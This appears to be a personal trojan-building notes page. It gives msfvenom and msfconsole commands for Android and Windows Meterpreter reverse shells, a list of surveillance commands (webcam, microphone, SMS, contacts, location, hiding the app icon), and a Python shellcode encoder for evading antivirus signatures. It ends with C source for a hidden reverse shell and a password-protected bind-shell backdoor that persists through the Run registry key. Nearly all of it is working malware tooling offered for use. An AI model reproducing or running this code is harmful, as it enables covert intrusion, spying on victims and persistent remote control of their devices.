Trojan

msfvenom

msfconsole

use exploit/multi/handler
set payload <platform>/meterpreter/reverse_tcp    (platform = android or windows — must match the msfvenom -p payload generated below)
show options 
set LHOST 192.168.0.106    (note: "set LHOST=192.168.0.106" with an '=' is wrong — msfconsole separates option and value with a space)
set LPORT 5555
exploit -j                 (start the listener as a background job before the payload runs on the target)

android

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.106 LPORT=5555 R > ./shell.apk

help:

Stdapi: Webcam Commands
===================================
    webcam_list  列出網絡攝像頭
    record_mic  從默認麥克風錄製 X 秒音頻
    webcam_chat  開始視頻聊天
    webcam_snap  從指定的攝像頭獲取快照
    webcam_stream -i 1  從指定的網絡攝像頭播放視頻流[選擇後攝像頭]
Android Commands
=================
	activity_start  通過 URI 字符串啓動 Android Activity
	check_root  檢查設備是否已 root
	dump_calllog  獲取通話記錄
	dump_contacts  獲取聯繫人列表
	dump_sms  獲取短信
	geolocate  利用地理定位獲取當前經緯度
	wlan_geolocate  利用 WLAN 信息獲取當前經緯度
	hide_app_icon  在啓動器（launcher）中隱藏應用程序圖標
	interval_collect  管理定時（按間隔）收集功能
	send_sms  從目標會話發送短消息
	set_audio_mode
	sqlite_query  從設備存儲中查詢 SQLite 數據庫
	wakelock  啓用/禁用Wakelock

windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.106 LPORT=5555 -f exe -o shell.exe

1

msfvenom -p  windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' LHOST=192.168.0.106 LPORT=5555 -f raw -o shellcode.raw
wget https://github.com/clinicallyinane/shellcode_launcher/raw/master/shellcode_launcher.exe    (a /blob/ URL returns the GitHub HTML page, not the binary — use /raw/ as in the SimpleShellcodeInjector step below; review the source or check a published hash before running a prebuilt .exe from a third-party repository)
shellcode_launcher.exe -i shellcode.raw

2

msfvenom -p  windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' LHOST=192.168.0.106 LPORT=5555 -f raw -o shellcode.raw
git clone https://github.com/Arno0x/ShellcodeWrapper
cd ShellcodeWrapper
python shellcode_encoder.py -cpp -cs -py shellcode.raw sir_123 xor    (the key is written into the generated wrapper source, so this only hides the shellcode from static signatures — it does not keep it secret)

shellcode_encoder.py (Python 3 port of the Arno0x script):

#!/usr/bin/python3
# -*- coding: utf8 -*-
#
# Author: Arno0x0x, Modify: cc-sir
#

import argparse
from Crypto.Hash import MD5
from Crypto.Cipher import AES
import pyscrypt
from base64 import b64encode
from os import urandom
from string import Template
import os

# Wrapper source templates and the matching output files, keyed by the
# language selector used on the command line (-cpp / -cs / -py).
_WRAPPER_BASENAME = 'encryptedShellcodeWrapper'
_WRAPPER_EXT = {'cpp': '.cpp', 'csharp': '.cs', 'python': '.py'}

# Input templates read by convertFromTemplate().
templates = {lang: './templates/' + _WRAPPER_BASENAME + ext for lang, ext in _WRAPPER_EXT.items()}

# Output paths; the cipher type is spliced in before the extension at write time.
resultFiles = {lang: './result/' + _WRAPPER_BASENAME + ext for lang, ext in _WRAPPER_EXT.items()}

# data as a bytearray
# key as a string
def xor(data, key):
	"""Return ``data`` XOR-ed byte-wise with the repeating ``key``.

	``data`` is a bytearray (or bytes); ``key`` is a str whose code points form
	the key stream (``key[i % len(key)]``). The result is ``bytes``.
	A repeating-key XOR is obfuscation only; it offers no confidentiality.
	"""
	keyBytes = [ord(c) for c in key]
	span = len(keyBytes)
	return bytes(b ^ keyBytes[i % span] for i, b in enumerate(data))

#------------------------------------------------------------------------
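def pad(s, block_size=None):
	"""Return ``s`` with PKCS#7 padding appended, as ``bytes``.

	``s`` may be bytes or a bytearray. ``block_size`` defaults to
	``AES.block_size`` (16); the result length is always a multiple of it and
	at least one padding byte is added (a full block when ``s`` is already
	aligned), each padding byte holding the pad length.

	Fix: the original concatenated ``chr(n) * n`` (a str) onto the bytearray,
	which raises TypeError on Python 3 and made the AES path unusable.
	"""
	if block_size is None:
		block_size = AES.block_size
	padLen = block_size - len(s) % block_size
	return bytes(s) + bytes([padLen]) * padLen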

#------------------------------------------------------------------------
def aesEncrypt(clearText, key):
	"""AES-CBC encrypt ``clearText`` with ``key`` and return ``iv || ciphertext``.

	``key`` is the 16-byte scrypt-derived key supplied by the caller. The IV is
	``AES.block_size`` bytes from ``os.urandom`` and is prepended so the
	generated wrapper can recover it; ``clearText`` is PKCS#7-padded via
	``pad`` first.
	NOTE(review): CBC without a MAC gives no integrity protection — acceptable
	for an obfuscation wrapper, not for data that must resist tampering.
	"""
	nonce = urandom(AES.block_size)
	padded = pad(clearText)
	encryptor = AES.new(key, AES.MODE_CBC, nonce)
	return nonce + encryptor.encrypt(bytes(padded))

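def convertFromTemplate(parameters, templateFile):
	"""Render ``templateFile`` (a ``string.Template`` source) with ``parameters``.

	Returns the rendered text, or ``None`` after printing a ``[!]`` message
	when the file cannot be read or when the template references a
	placeholder that ``parameters`` does not supply. The original only
	caught I/O errors, so an unmatched ``$name`` in a template aborted the
	whole run with an uncaught KeyError.
	"""
	try:
		with open(templateFile) as f:
			src = Template(f.read())
	except OSError:
		print (color("[!] Could not open or read template file [{}]".format(templateFile)))
		return None
	try:
		return src.substitute(parameters)
	except (KeyError, ValueError) as err:
		# KeyError: placeholder missing from parameters; ValueError: malformed $-syntax
		print (color("[!] Template file [{}] has an unresolved placeholder: {}".format(templateFile, err)))
		return None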

def formatCPP(data, key, cipherType):
	"""Write the C++ wrapper for ``data`` to ./result/..._<cipherType>.cpp.

	``data`` is the transformed shellcode (bytes/bytearray), rendered as one
	``\\x..\\x..`` escape string; ``key`` and ``cipherType`` are passed to the
	template verbatim (NOTE(review): ``key`` is not escaped, so a quote or
	backslash in it would presumably break the generated literal — the
	template itself is not visible here). Prints a ``[+]`` or ``[!]`` line;
	returns None.
	"""
	shellcode = "\\x" + "\\x".join("{:02x}".format(b) for b in data)
	rendered = convertFromTemplate({'shellcode': shellcode, 'key': key, 'cipherType': cipherType}, templates['cpp'])
	if rendered is None:
		return

	base, ext = os.path.splitext(resultFiles['cpp'])
	fileName = "{}_{}{}".format(base, cipherType, ext)
	try:
		with open(fileName, "w+") as out:
			out.write(rendered)
		print (color("[+] C++ code file saved in [{}]".format(fileName)))
	except IOError:
		print (color("[!] Could not write C++ code  [{}]".format(fileName)))

# data as a bytearray
def formatCSharp(data, key, cipherType):
	"""Write the C# wrapper for ``data`` to ./result/..._<cipherType>.cs.

	``data`` is the transformed shellcode (bytes/bytearray), rendered as a
	``0x..,0x..`` byte list; ``key`` and ``cipherType`` are passed to the
	template verbatim (NOTE(review): ``key`` is not escaped for a C# string
	literal — the template is not visible here, confirm). Prints a ``[+]``
	or ``[!]`` line; returns None.
	"""
	shellcode = '0x' + ',0x'.join('{:02x}'.format(b) for b in data)
	rendered = convertFromTemplate({'shellcode': shellcode, 'key': key, 'cipherType': cipherType}, templates['csharp'])
	if rendered is None:
		return

	base, ext = os.path.splitext(resultFiles['csharp'])
	fileName = "{}_{}{}".format(base, cipherType, ext)
	try:
		with open(fileName, "w+") as out:
			out.write(rendered)
		print (color("[+] C# code file saved in [{}]".format(fileName)))
	except IOError:
		print (color("[!] Could not write C# code  [{}]".format(fileName)))

#------------------------------------------------------------------------
# data as a bytearray
def formatPy(data, key, cipherType):
	"""Write the Python wrapper for ``data`` to ./result/..._<cipherType>.py.

	``data`` is the transformed shellcode (bytes/bytearray), rendered as one
	``\\x..\\x..`` escape string; ``key`` and ``cipherType`` are passed to the
	template verbatim (NOTE(review): ``key`` is not escaped for a Python
	string literal — the template is not visible here, confirm). Prints a
	``[+]`` or ``[!]`` line; returns None.
	"""
	shellcode = '\\x' + '\\x'.join('{:02x}'.format(b) for b in data)
	rendered = convertFromTemplate({'shellcode': shellcode, 'key': key, 'cipherType': cipherType}, templates['python'])
	if rendered is None:
		return

	base, ext = os.path.splitext(resultFiles['python'])
	fileName = "{}_{}{}".format(base, cipherType, ext)
	try:
		with open(fileName, "w+") as out:
			out.write(rendered)
		print (color("[+] Python code file saved in [{}]".format(fileName)))
	except IOError:
		print (color("[!] Could not write Python code  [{}]".format(fileName)))

# data as a bytearray
def formatB64(data):
	"""Return ``data`` (bytes/bytearray) as standard base64, as a ``bytes`` object."""
	encoded = b64encode(data)
	return encoded

def color(string, color=None):
    """
    Author: HarmJ0y, borrowed from Empire
    Wrap ``string`` in bold ANSI colour codes for a Linux terminal.

    With an explicit ``color`` ("red"/"green"/"blue", case-insensitive) the
    string is always wrapped: bold plus that colour, or bold only for an
    unknown name. Without one, the colour follows the message prefix after
    stripping whitespace: ``[!]`` red, ``[+]`` green, ``[?]`` yellow,
    ``[*]`` blue; any other string is returned untouched.
    """
    named = {"red": '31', "green": '32', "blue": '34'}
    byPrefix = (("[!]", '31'), ("[+]", '32'), ("[?]", '33'), ("[*]", '34'))

    def wrap(codes):
        # '1' (bold) always comes first, then the optional colour code
        return '\x1b[%sm%s\x1b[0m' % (';'.join(codes), string)

    if color:
        code = named.get(color.lower())
        return wrap(['1'] if code is None else ['1', code])

    stripped = string.strip()
    for prefix, code in byPrefix:
        if stripped.startswith(prefix):
            return wrap(['1', code])
    return string

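if __name__ == '__main__':
	#------------------------------------------------------------------------
	# Parse arguments
	parser = argparse.ArgumentParser(description="XOR-encode or AES-encrypt raw shellcode and wrap it in C++/C#/Python source")
	parser.add_argument("shellcodeFile", help="File name containing the raw shellcode to be encoded/encrypted")
	parser.add_argument("key", help="Key used to transform (XOR or AES encryption) the shellcode")
	parser.add_argument("encryptionType", help="Encryption algorithm to apply to the shellcode", choices=['xor','aes'])
	parser.add_argument("-b64", "--base64", help="Display transformed shellcode as base64 encoded string", action="store_true")
	parser.add_argument("-cpp", "--cplusplus", help="Generates C++ file code", action="store_true")
	parser.add_argument("-cs", "--csharp", help="Generates C# file code", action="store_true")
	parser.add_argument("-py", "--python", help="Generates Python file code", action="store_true")
	args = parser.parse_args()

	# Make sure the output directory exists. exist_ok closes the window in
	# which a concurrent run could create it between the isdir() check and
	# the makedirs() call.
	if not os.path.isdir("./result"):
		os.makedirs("./result", exist_ok=True)
		print (color("[+] Creating [./result] directory for resulting code files"))

	# Read the whole shellcode file as bytes. On failure exit non-zero; the
	# original called quit(), which exits with status 0 and hides the
	# failure from any calling script.
	try:
		with open(args.shellcodeFile,"rb") as shellcodeFileHandle:
			shellcodeBytes = bytearray(shellcodeFileHandle.read())
		print (color("[*] Shellcode file [{}] successfully loaded".format(args.shellcodeFile)))
	except OSError:
		print (color("[!] Could not open or read file [{}]".format(args.shellcodeFile)))
		raise SystemExit(1)

	print (color("[*] MD5 hash of the initial shellcode: [{}]".format(MD5.new(shellcodeBytes).hexdigest())))
	print (color("[*] Shellcode size: [{}] bytes".format(len(shellcodeBytes))))

	# Perform AES128 transformation
	if args.encryptionType == 'aes':
		# Derive a 16-byte (128-bit) key from the passphrase with scrypt. The
		# salt and cost parameters (N=1024, r=1, p=1) are fixed, and the
		# derived key is written verbatim into the generated wrapper, so this
		# is obfuscation, not a secret: anyone holding the output can decrypt.
		# NOTE(review): pyscrypt may require bytes rather than str for the
		# password/salt on Python 3 — confirm against the installed version.
		key = pyscrypt.hash(args.key, "saltmegood", 1024, 1, 1, 16)
		# b64encode returns bytes; decode so the key lands in the templates
		# and the log line as text rather than the Python 3 repr "b'...'",
		# which produced unusable generated wrappers.
		masterKey = formatB64(key).decode('ascii')
		print (color("[*] AES encrypting the shellcode with 128 bits derived key [{}]".format(masterKey)))
		transformedShellcode = aesEncrypt(shellcodeBytes, key)
		cipherType = 'aes'

	# Perform XOR transformation
	elif args.encryptionType == 'xor':
		masterKey = args.key
		print (color("[*] XOR encoding the shellcode with key [{}]".format(masterKey)))
		transformedShellcode = xor(shellcodeBytes, masterKey)
		cipherType = 'xor'

	# Display interim results
	print ("\n==================================== RESULT ====================================\n")
	print (color("[*] Encrypted shellcode size: [{}] bytes".format(len(transformedShellcode))))

	# Display formated output
	if args.base64:
		print (color("[*] Transformed shellcode as a base64 encoded string"))
		# decode for the same reason as masterKey: print the text, not b'...'
		print (formatB64(transformedShellcode).decode('ascii'))
		print ("")

	if args.cplusplus:
		print (color("[*] Generating C++ code file"))
		formatCPP(transformedShellcode, masterKey, cipherType)
		print ("")

	if args.csharp:
		print (color("[*] Generating C# code file"))
		formatCSharp(transformedShellcode, masterKey, cipherType)
		print ("")

	if args.python:
		print (color("[*] Generating Python code file"))
		formatPy(transformedShellcode, masterKey, cipherType)
		print ("")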

3

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.106 LPORT=5555 -f c -o msf.txt

code:

# strip the C array syntax ("unsigned char buf[]", quotes, \x, semicolons, newlines) and print the shellcode as one contiguous hex string
cat msf.txt|grep -v unsigned|sed "s/\"\\\x//g"|sed "s/\\\x//g"|sed "s/\"//g"|sed ':a;N;$!ba;s/\n//g'|sed "s/;//g"
wget https://github.com/DimopoulosElias/SimpleShellcodeInjector/raw/master/SimpleShellcodeInjector.c
i686-w64-mingw32-gcc SimpleShellcodeInjector.c -o ssi.exe
ssi.exe <hex string printed by the pipeline above>

ssi

反向連接（reverse shell：木馬主動連回控制端，控制端需先啓動監聽）

//#include "stdafx.h"
#include <winsock2.h>
#pragma comment(lib,"ws2_32.lib")
#pragma comment(lib,"advapi32.lib")
#pragma comment(lib,"user32.lib")
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")

/*
 * Reverse-shell payload: connects out to IP:port and hands the connected
 * socket to a hidden cmd.exe as its stdin/stdout/stderr.
 *
 * Review notes:
 *  - Every Winsock and CreateProcess return value is ignored; if connect()
 *    fails, cmd.exe is still spawned on an unconnected socket.
 *  - `sin` is never zeroed, so sin_zero holds whatever was on the stack.
 *  - The parameter list is WinMain's (HINSTANCE, ..., nCmdShow) but the
 *    function is named _tmain and the linker entry is mainCRTStartup; with
 *    stdafx.h commented out, nothing visible maps _tmain to main, so this
 *    presumably only links inside the original Visual Studio project.
 *  - The hard-coded 172.16.217.1:1234 differs from the 192.168.0.106:5555
 *    handler used elsewhere on this page. The channel is plain TCP with no
 *    authentication or encryption.
 */
int _tmain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR LpszCmdLine,int nCmdShow)
{
	WSADATA wd;
	SOCKET sock;
	STARTUPINFO si;
	PROCESS_INFORMATION pi;
	struct sockaddr_in sin;
	char IP[16]="172.16.217.1\x00"; // target (listener) IP; the explicit \x00 is redundant, the literal is NUL-terminated
	unsigned short port=1234; // listener port
	memset(&si,0,sizeof(si));
	WSAStartup(MAKEWORD(1,1),&wd);
	sock = WSASocket(PF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0);
	sin.sin_family = AF_INET;
	sin.sin_port = htons(port);
	sin.sin_addr.s_addr = inet_addr(IP);

	connect(sock,(struct sockaddr*)&sin,sizeof(sin)); // result unchecked
	si.cb = sizeof(si);
	si.dwFlags = STARTF_USESHOWWINDOW + STARTF_USESTDHANDLES;
	si.wShowWindow = SW_HIDE;
	// The socket becomes the child's std handles; this relies on the handle
	// being inheritable together with bInheritHandles=TRUE below.
	si.hStdInput = si.hStdOutput = si.hStdError = (void *)sock;
	CreateProcess(NULL,"cmd.exe",NULL,NULL,TRUE,0,0,NULL,&si,&pi);
	return 0;
}

主動連接（bind shell：木馬在本機監聽端口，控制端主動連接並發送口令）

//#include "stdafx.h"
#include <winsock2.h>
#include <Windows.h>
#include <string.h>
#pragma comment(lib,"ws2_32.lib")
#define MasterPort 999
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") 
// GUI subsystem + CRT entry point: the console program runs without a visible console window
/*
 * Persistence: registers this executable under the HKLM Run key and copies
 * itself to C:\Windows\MiniMuma.exe. Both steps need administrator rights
 * (HKLM write and writing into C:\Windows); every return code is discarded,
 * so a non-elevated run silently does nothing. Always returns 0.
 *
 * Defects (review, not fixed here):
 *  - `syspath` is never initialised before strcat() appends to it -- that
 *    is undefined behaviour; it only "works" when the stack happens to hold
 *    a NUL at syspath[0]. strcpy(), or passing the literal directly, is
 *    what was intended.
 *  - RegSetValueEx is given cbData=25, but "C:\\Windows\\MiniMuma.exe" is
 *    23 characters + NUL = 24 bytes, so one byte past the literal is read
 *    and stored in the value.
 *  - The WOW6432Node path is the 32-bit view of the Run key; the commented
 *    RegOpenKeyEx/KEY_WOW64_64KEY line below is the 64-bit variant.
 */
int add_reg(){ // add an auto-start entry
	char regname[] = "SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run";
	//"Software\\Microsoft\\Windows\\CurrentVersion\\Run";
	HKEY hkResult;
	int ret;
	ret = RegOpenKey(HKEY_LOCAL_MACHINE,regname,&hkResult); // return value never checked
	//ret = RegOpenKeyEx(HKEY_LOCAL_MACHINE, regname, 0, KEY_ALL_ACCESS | KEY_WOW64_64KEY, &hkResult);
	ret = RegSetValueEx(hkResult,"MiniMuma",0,REG_EXPAND_SZ,(unsigned char *)"C:\\Windows\\MiniMuma.exe",25); // 25 overruns the 24-byte literal by one
	
	char modlepath[256];
	char syspath[256]; // uninitialised, yet strcat() below appends to it
	GetModuleFileName(0,modlepath,256); // full path of this executable
	ret = CopyFile(modlepath,strcat(syspath,"C:\\Windows\\MiniMuma.exe"),1); // bFailIfExists=1: never overwrites an existing copy
	return 0;
}


/*
 * Bind-shell payload. Installs persistence via add_reg(), then loops:
 * listen on 0.0.0.0:MasterPort (999), accept one client, read a password
 * line, and on an exact match of "cc_sir\n" hand the socket to %COMSPEC%
 * as stdin/stdout/stderr until that shell exits. "quite\n" (presumably a
 * typo for "quit") ends the loop; anything else gets an error reply and
 * the listener is re-created.
 *
 * Review notes:
 *  - bind()/listen()/accept()/recv()/CreateProcess() results are ignored.
 *  - `Pass` is 256 bytes and recv() is asked for 256, so a client sending
 *    256+ bytes leaves no NUL terminator and strcmp() reads past the buffer
 *    (the ZeroMemory each iteration only protects shorter reads).
 *  - The "password" is a plaintext constant compared over an unencrypted
 *    TCP socket: anyone who reads the binary or sniffs the traffic has it.
 *    It must end in a bare "\n"; a client sending "\r\n" never matches.
 *  - `SockAddrIn` is never zeroed (sin_zero undefined); WSAStartup and
 *    WSACleanup are paired once per iteration, which is wasteful but balanced.
 *  - The listening port is exposed on every interface; no client filtering.
 */
int _tmain(int argc, _TCHAR* argv[])
{
    WSADATA WSADa;
    sockaddr_in SockAddrIn;
    SOCKET CSocket,SSocket;
    int iAddrSize;
    PROCESS_INFORMATION ProcessInfo;
	STARTUPINFO StartupInfo;
	char szCMDPath[255];
	char Pass[256];
	add_reg();
	while(1){
		ZeroMemory(&ProcessInfo,sizeof(PROCESS_INFORMATION));
		ZeroMemory(&StartupInfo,sizeof(STARTUPINFO));
		ZeroMemory(&WSADa,sizeof(WSADATA));
		ZeroMemory(&Pass,sizeof(Pass));

		GetEnvironmentVariable("COMSPEC",szCMDPath,sizeof(szCMDPath)); // usually cmd.exe
		WSAStartup(0x0202,&WSADa);
	
		SockAddrIn.sin_family = AF_INET;
		SockAddrIn.sin_addr.s_addr = INADDR_ANY; // listen on all interfaces
		SockAddrIn.sin_port = htons(MasterPort);
		CSocket = WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0);

		bind(CSocket,(sockaddr *)&SockAddrIn,sizeof(SockAddrIn)); // unchecked

		listen(CSocket,1);
		iAddrSize = sizeof(SockAddrIn);
		SSocket = accept(CSocket,(sockaddr *)&SockAddrIn,&iAddrSize); // blocks; may return INVALID_SOCKET, unchecked
		StartupInfo.cb = sizeof(STARTUPINFO);
		StartupInfo.wShowWindow = SW_HIDE;
		StartupInfo.dwFlags = STARTF_USESTDHANDLES|STARTF_USESHOWWINDOW;
		// The client socket becomes the shell's std handles (needs
		// bInheritHandles=TRUE in CreateProcess below).
		StartupInfo.hStdError = (HANDLE)SSocket;
		StartupInfo.hStdInput = (HANDLE)SSocket;
		StartupInfo.hStdOutput = (HANDLE)SSocket;
		int ret,ret2;
		recv(SSocket,Pass,256,0); // a full 256-byte read leaves Pass unterminated
		ret = strcmp(Pass,"cc_sir\n");	// password, exact match including trailing "\n"
		ret2 = strcmp(Pass,"quite\n");	// shutdown command ("quite" is presumably meant as "quit")
		
		if(ret == 0){
			CreateProcess(NULL,szCMDPath,NULL,NULL,TRUE,0,NULL,NULL,&StartupInfo,&ProcessInfo);
			WaitForSingleObject(ProcessInfo.hProcess,INFINITE); // block until the shell exits
			CloseHandle(ProcessInfo.hProcess);
			CloseHandle(ProcessInfo.hThread);

			closesocket(CSocket);
			closesocket(SSocket);
			WSACleanup();
		}
		else if(ret2 == 0){
			send(SSocket,"MiniMuma quite!\n",sizeof("MiniMuma quite!\n"),0); // sizeof includes the NUL, which is sent too
			closesocket(CSocket);
			closesocket(SSocket);
			WSACleanup();
			break;
		}
		else{
			send(SSocket,"Passwd is Error!\n",sizeof("Passwd is Error!\n"),0);
			closesocket(CSocket);
			closesocket(SSocket);
			WSACleanup();
		}
	}
	return 0;
}